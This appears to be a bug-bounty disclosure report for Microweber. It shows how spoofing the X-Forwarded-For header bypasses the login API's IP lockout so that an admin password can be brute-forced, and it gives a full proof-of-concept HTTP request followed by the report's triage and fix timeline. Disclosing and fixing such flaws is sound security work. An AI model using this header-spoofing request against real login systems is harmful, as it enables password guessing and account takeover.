Bypass IP detection to brute-force password in microweber/microweber

Valid

Reported on

Jul 8th 2022


Description

In login API, by default, the IP address will be blocked when the user tries to login incorrectly more than 5 times but we can bypass this mechanism by abuse X-Forwarded-For header to bypass IP dectection and perform password brute-force.

Proof of Concept

POST /demo/api/user_login HTTP/1.1
Host: demo.microweber.org
Cookie: laravel_session=7HR3GLXKE5PUU6zXUPalGnXO1gTV1WslmgbrQkn1; XSRF-TOKEN=eyJpdiI6IkpKdWVoUmExR2NNWmllU3MzcjBIYmc9PSIsInZhbHVlIjoidjlWZitGNllSbEZHajJzYzVNa3dmdHRDdHdRWVdLOG03YUZQMzRIemgvaU9RbXJHWDV2REJrNVREZndCbjcrdVo5TXJ0SUtaYUlZK2E1bjQ5dTc5Q2lHbjd6ZHE0SkhGK0N5YzRja0liU21GdFJXY3FOTVZmZlVnR2x6WEdlMUkiLCJtYWMiOiJiNmY2ZjAxY2JkMTdlNzk4ZWY1MmExMGEzMDIzYThlM2Y2MzgwZDBjMzhkMGM5NmZiMTI5ODI4YjBjMWMzNTVhIiwidGFnIjoiIn0%3D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Xsrf-Token: eyJpdiI6IkpKdWVoUmExR2NNWmllU3MzcjBIYmc9PSIsInZhbHVlIjoidjlWZitGNllSbEZHajJzYzVNa3dmdHRDdHdRWVdLOG03YUZQMzRIemgvaU9RbXJHWDV2REJrNVREZndCbjcrdVo5TXJ0SUtaYUlZK2E1bjQ5dTc5Q2lHbjd6ZHE0SkhGK0N5YzRja0liU21GdFJXY3FOTVZmZlVnR2x6WEdlMUkiLCJtYWMiOiJiNmY2ZjAxY2JkMTdlNzk4ZWY1MmExMGEzMDIzYThlM2Y2MzgwZDBjMzhkMGM5NmZiMTI5ODI4YjBjMWMzNTVhIiwidGFnIjoiIn0=
X-Requested-With: XMLHttpRequest
Content-Length: 27
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: orange
X-Forwarded-For: 127.0.0.55 // Change IP
Te: trailers
Connection: close

username=admin&password=123

PoC Video

PoC Video

Note: If the image quality is low when viewing live, you can download and watch

Impact

This vulnerabiliy allow the attacker can perform bruteforce admin's password, perform deny of services attack, ...

We are processing your report and will contact the microweber team within 24 hours. a month ago
Nhien.IT modified the report
a month ago
Nhien.IT modified the report
a month ago
Nhien.IT modified the report
a month ago
We have contacted a member of the microweber team and are waiting to hear back 25 days ago
Peter Ivanov modified the Severity from High (8.3) to Medium (6.5) 23 days ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Peter Ivanov validated this vulnerability 23 days ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov confirmed that a fix has been merged on 53c000 23 days ago
Peter Ivanov has been awarded the fix bounty
to join this conversation